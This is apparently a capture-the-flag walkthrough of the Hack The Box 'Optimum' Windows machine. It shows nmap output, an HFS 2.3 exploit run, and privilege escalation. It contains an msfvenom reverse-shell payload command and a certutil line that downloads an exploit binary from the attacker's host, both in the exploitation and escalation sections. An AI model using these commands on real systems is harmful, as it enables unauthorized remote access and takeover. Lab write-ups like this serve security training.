Box: Optimum
Level: Easy
OS: Windows
Lets get started
Recon
Portscanning
command:sudo nmap -A -T4 -v -p- 10.129.111.57
Nmap scan report for 10.129.111.57
Host is up (0.20s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.015 days (since Sun Sep 17 16:46:43 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 197.31 ms 10.10.14.1
2 197.47 ms 10.129.111.57
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 17 17:07:49 2023 -- 1 IP address (1 host up) scanned in 778.27 seconds
From the above scan, we have only 1 open port and that’s the port that runs the http service. This means our enumeration today will be focused on port 80
Enumeration
Navigate to the webpage
This webpage is being hosted by HttpFileServer.
I think there’s an exploit for this version of HttpFileServer, well lets check
Well there is😅. Lets exploit right away
Exploitation
Well, I found this great exploit, you can download it here
So, we’ll set the LHOST to our tun0 ip, we’ll also set the LPORT to the port we plan on listening on
Save the script.
As per the instruction in the script, we were told to host a nc.exe file, well I generated the .exe file using msfvenom
command:msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.43 LPORT=443 -f exe -o nc.exe
┌──(bl4ck4non㉿bl4ck4non)-[~/Downloads/HTB/optimum]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.43 LPORT=443 -f exe -o nc.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: nc.exe
Ensure you have your netcat listener ready before running the script
Running the script requires the target’s ip and port
command:python2 39161.py 10.129.58.117 80
Alongside running this script, we’ll host the nc.exe file
command:python3 -m http.server 80
Checking our netcat listener,
We didn’t spawn a shell🥲, running the script again
Checking our netcat listener,
We got a user shell🙂. Lets go ahead and escalate our privileges.
Privilege Escalation
Running the systeminfo command, I found something interesting
Well, that os version has a vulnerability that can assist us in escalatiing our privileges.
You can get the exploit here. Well, this exploit is in .c, we can just download the .exe file, since it will be easier to execute on a windows target. You can download the .exe flle from here
The next thing we’ll do is send this over to the target’s machine
command:certutil -urlcache -f http://10.10.14.44/41020.exe exploit.exe
To execute this file we can run the command .\exploit.exe, this should drop us in a privileged shell
We have successfully pwned this box 😎
That will be all for today
Back To Home